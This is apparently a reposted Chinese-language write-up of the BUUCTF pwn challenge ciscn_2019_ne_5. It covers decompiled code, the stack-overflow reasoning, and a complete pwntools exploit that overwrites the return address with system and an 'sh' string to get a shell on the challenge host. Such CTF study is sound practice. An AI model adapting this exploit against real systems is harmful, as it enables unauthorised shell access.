[BUUCTF-pwn]——ciscn_2019_ne_5

• 題目地址:https://buuoj.cn/challenges#ciscn_2019_ne_5
  checksec下
  
  在IDA中，竟然不給我反匯編，第一次碰到．
  
  查了下解決方法,在反匯編失敗的地方,單獨(dú)反匯編就好.
  

int __cdecl main(int argc, const char **argv, const char **envp) {int v3; // [esp+0h] [ebp-100h]char src[4]; // [esp+4h] [ebp-FCh]char v5; // [esp+8h] [ebp-F8h]char s1[4]; // [esp+84h] [ebp-7Ch]char v7; // [esp+88h] [ebp-78h]char *v8; // [esp+E8h] [ebp-18h]int *v9; // [esp+ECh] [ebp-14h]int *v10; // [esp+F4h] [ebp-Ch]v10 = &argc;setbuf(stdin, 0);setbuf(stdout, 0);setbuf(stderr, 0);fflush(stdout);*(_DWORD *)s1 = 48;memset(&v7, 0, 0x60u);*(_DWORD *)src = 48;memset(&v5, 0, 0x7Cu);puts("Welcome to use LFS.");printf("Please input admin password:");__isoc99_scanf();if ( strcmp(s1, "administrator") ){puts("Password Error!");exit(0);}puts("Welcome!");while ( 1 ){puts("Input your operation:");puts("1.Add a log.");puts("2.Display all logs.");puts("3.Print all logs.");printf("0.Exit\n:");v9 = &v3;v8 = "%d";__isoc99_scanf();switch ( v3 ){case 0:exit(0);return;case 1:v8 = src;AddLog();break;case 2:Display(src);break;case 3:Print();break;case 4:GetFlag(src);break;default:continue;}} }

由于最開始的反匯編失敗,反匯編的代碼可能與實(shí)際有些許出入,應(yīng)該就是反匯編失敗的地方,__isoc99_scanf() 函數(shù). 通過驗(yàn)證得到第一個(gè)是給s1賦值,第二個(gè)是給v3賦值;AddLog()函數(shù)里面的應(yīng)該是給src賦值

思路也就出來了: 在1選項(xiàng)中AddLog()給src賦值, 然后,在4選項(xiàng),通過strcpy給dest賦值,進(jìn)行棧溢出的利用.
查看一下,有沒有可以利用的字符串,畢竟已經(jīng)找到了system函數(shù)

發(fā)現(xiàn)了 ‘sh’ 字符

exploit

from pwn import * context.os='linux' context.arch='i386' context.log_level='debug' p = remote("node3.buuoj.cn",25035) sh_addr = 0x080482ea system_addr = 0x080486B9 p.sendlineafter("Please input admin password:",'administrator') p.sendlineafter("0.Exit\n:",'1') payload = 'a'*(0x48+0x4)+p32(system_addr)+p32(sh_addr)p.sendlineafter("Please input new log info:",payload) p.sendlineafter("0.Exit\n:",'4')p.interactive()

總結(jié)

以上是生活随笔為你收集整理的[BUUCTF-pwn]——ciscn_2019_ne_5的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。